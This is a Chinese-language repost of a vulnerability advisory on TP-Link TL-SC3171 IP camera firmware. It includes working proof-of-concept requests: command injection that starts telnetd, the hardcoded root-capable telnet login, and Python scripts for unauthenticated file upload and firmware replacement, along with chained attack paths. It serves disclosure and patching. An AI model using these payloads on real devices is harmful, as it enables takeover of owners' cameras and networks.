TP-Link网络摄像机的多个漏洞详细分析

  • A+
所属分类:硬件安全

漏洞描述:

在TP-LinkTL-SC3171 IP Cameras网络摄像机的版本为LM.1.6.18P12_sign5的固件上发现多个漏洞,这些漏洞允许攻击者做如下的事情:

1:[CVE-2013-2578]通过文件 /cgi-bin/admin/servetest执行任意命令。

2:[CVE-2013-2579]用硬编码身份凭证的shell执行任意命令。

3:[CVE-2013-2580]执行未经身份认证的远程文件上传。

4:[CVE-2013-2581]执行未经身份认证的固件升级。

攻击路径:

通过结合这些漏洞,多个攻击路径可被利用。额外的攻击路径也是可用的,但这里的攻击路径可以让你了解攻击者如何危及受影响的的设备。

攻击路径1:

(验证:无)

1:通过[CVE-2013-2581]漏洞上传一个已经root的固件。

2:通过http://<ip-cam>/cgi-bin/reboot 重启设备。

攻击路径2:

(验证:绕过)

1:通过http://<ip-cam>/cgi-bin/hardfactorydefault将设备重置为出厂默认设置。之后,通过使用admin:admin作为有效的用户和密码绕过验证。

2:通过http://<ip-cam>/cgi-bin/reboot重启设备。

3:通过[CVE-2013-2578]漏洞开启Telnet服务。

4:使用用户qmik(没有密码)登陆Telnet服务,并使该设备作为枢轴点。

受影响的设备和固件:

TP-Link TL-SC3130 (固件版本LM.1.6.18P12_sign5及以下)
TP-Link TL-SC3130G (固件版本LM.1.6.18P12_sign5及以下)
TP-Link TL-SC3171 (固件版本M.1.6.18P12_sign5及以下)
TP-Link TL-SC3171G (固件版本LM.1.6.18P12_sign5及以下)

其他的TP-Link网络摄像机和固件版本可能也受影响。

供应商信息,解决方案和解决方法:

厂商提供的测试版修补固件版本链接如下:

[3] http://www.tp-link.com/resources/software/1.6.18P12_sign6_TL-SC3130.zip
[4] http://www.tp-link.com/resources/software/1.6.18P12_sign6_TL-SC3130G.zip
[5] http://www.tp-link.com/resources/software/1.6.18P12_sign6_TL-SC3171.zip
[6] http://www.tp-link.com/resources/software/1.6.18P12_sign6_TL-SC3171G.zip

最终的正式版本将公布在未来数天,请联系TP-LINK了解更多信息。

技术细节说明和PoC:

1:servetest中的操作系统命令注入

[CVE-2013-2578]文件/cgi-bin/admin/servetest有几个参数可以被用于操作系统命令注入,这会导致通过身份验证的用户可以执行任意命令。下面的PoC启动telnet服务:

GET
/cgi-bin/admin/servetest?cmd=smtp&ServerName=1.1.1.1;/usr/sbin/telnetd;&ServerPort=25&ServerSSL=off&RcptToAddr1=q@q&AdminAddr=q@q
HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: <a href="http://192.168.1.100/progress.htm">http://192.168.1.100/progress.htm</a>
If-Modified-Since: Sat, 1 Jan 2000 00:00:00 GMT
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64;
Trident/5.0)
Host: 192.168.1.100
Proxy-Connection: Keep-Alive
Cookie: VideoFmt=1
Authorization: Basic YWRtaW46YWRtaW4=
Content-Length: 2

2:telnet服务中的硬编码身份认证

[CVE-2013-2579]受影响的系统包含一个不需要密码的硬编码登录,这会导致远程攻击者使用这个内置的telnet服务来登录受影响设备的操作系统,用户和密码:

username: qmik
password: (none)

qmik用户被允许执行命令su,这会导致以root权限执行任意命令。telnet服务可以用通过[CVE-2013-2578]漏洞开启。

3:未经身份验证的远程文件上传

[CVE-2013-2580]文件/cgi-bin/uploadfile允许未经身份验证的用户进行远程文件上传,下面是Python PoC:

import requests
 
fileName = "lala.tmp"
f = open(fileName, "w")
f.write("lala")
f.close()
requests.post("<a href="http://192.168.1.100/cgi-bin/uploadfile">http://192.168.1.100/cgi-bin/uploadfile</a>", files={fileName: open(fileName, "rb")})

上传文件(在本例中lala.tmp)将会被放置在/mnt/mtd目录中。

4:未经身份验证的远程固件升级

[CVE-2013-2581]文件/cgi-bin/firmwareupgrade允许未经身份验证的用户执行远程固件升级,PythonPoC如下:

import requests
 
requests.get("<a href="http://192.168.1.100/cgi-bin/firmwareupgrade?action=preset">http://192.168.1.100/cgi-bin/firmwareupgrade?action=preset</a>")
fileName = "COM_T01F001_LM.1.6.18P12_sign5_TPL.TL-SC3171.bin"
cookies={"VideoFmt":"1"}
requests.post("<a href="http://192.168.1.100/cgi-bin/firmwareupgrade?action=preset">http://192.168.1.100/cgi-bin/firmwareupgrade?action=preset</a>", files={"SetFWFileName" : (fileName, open(fileName, "rb"))}, cookies=cookies)

引用:

[1] TP-Link TL-SC3171, http://www.tp-link.com/en/products/details/?categoryid=230&model=TL-SC3171
[2] Security Analysis of IP video surveillance cameras, http://seclists.org/fulldisclosure/2013/Jun/84
[3] http://www.tp-link.com/resources/software/1.6.18P12_sign6_TL-SC3130.zip
[4] http://www.tp-link.com/resources/software/1.6.18P12_sign6_TL-SC3130G.zip
[5] http://www.tp-link.com/resources/software/1.6.18P12_sign6_TL-SC3171.zip
[6] http://www.tp-link.com/resources/software/1.6.18P12_sign6_TL-SC3171G.zip

原文来自:http://www.coresecurity.com/advisories/multiple-vulnerabilities-tp-link-tl-sc3171-ip-cameras#other

  • 我的微信
  • 这是我的微信扫一扫
  • weinxin
  • 我的微信公众号
  • 我的微信公众号扫一扫
  • weinxin

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: